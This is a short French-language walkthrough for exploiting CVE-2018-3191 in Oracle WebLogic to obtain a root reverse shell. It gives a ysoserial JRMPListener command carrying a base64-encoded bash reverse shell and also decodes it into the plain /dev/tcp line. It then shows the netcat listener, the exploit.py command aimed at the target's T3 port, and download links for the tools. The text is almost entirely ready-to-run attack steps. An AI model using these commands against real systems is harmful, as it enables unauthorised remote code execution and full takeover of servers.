
CVE-2018-3191 shell inversé
CVE-2018-3191 Shell inversé IP locale : 172.16.38.1 Weblogic : 172.16.38.174:7001 1、 Exécution locale java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 2222 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMzguMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}'
Puis exécutez nc -lvv 7777
(1) Parmi ces commandes, la commande bash a été encodée en base64 puis décodée pour éviter l'échappement des caractères spéciaux lors de l'exécution par Runtime.getRuntime().exec(). Le texte en clair est bash -i >& /dev/tcp/172.16.38.1/7777 0>&1 (2) Cette opération écoute un JRMPListener localement, reçoit les requêtes du weblogic ciblé, et exécute la commande de shell inversé bash spécifiée. (3) Nc écoute sur le port 7777 en attendant la connexion du shell inversé bash de la machine weblogic. 2、 Exécutez python exploit.py 172.16.38.247 7001 weblogic-spring-jndi-10.3.6.0.jar 172.16.38.1 2222, exploite la vulnérabilité pour faire en sorte que weblogic accède au service rmi distant et exécute la commande de shell inversé bash.
3、 Le port écouté par nc reçoit le bash inversé, avec les privilèges root.
Outils nécessaires à l'attaque : ysoserial-master.jar // outil d'exploitation de désérialisationhttps://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar weblogic-spring-jndi-10.3.6.0.jar // outil de génération de payload pour CVE-2018-3191 https://github.com/voidfyoo/CVE-2018-3191/releases exploit.py // outil d'envoi du protocole t3 de weblogic, intégrant le payload CVE-2018-3191